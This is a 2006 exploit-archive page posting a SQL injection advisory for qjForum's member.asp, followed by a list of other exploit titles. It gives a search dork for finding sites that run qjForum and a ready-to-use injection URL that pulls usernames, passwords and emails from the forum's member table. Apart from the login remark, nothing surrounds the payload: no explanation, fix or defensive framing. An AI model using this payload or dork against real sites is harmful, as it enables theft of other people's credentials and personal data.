exploits , vulnerabilities , articles , qjForum (member.asp) SQL Injection Vulnerability

2006-05-26

qjForum (member.asp) SQL Injection Vulnerability

Rated as : Moderate Risk

# Title  :   qjForum(member.asp) SQL Injection Vulnerability
# Author :   ajann
# greetz :   Nukedx,TheHacker
# Dork   :   "qjForum"
# Exploit:

# Login before injection.

###
http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member


securitydot.net - 2006-05-26

Exploits - newest 10 RSS | More

2007-06-15 38445 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23886 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit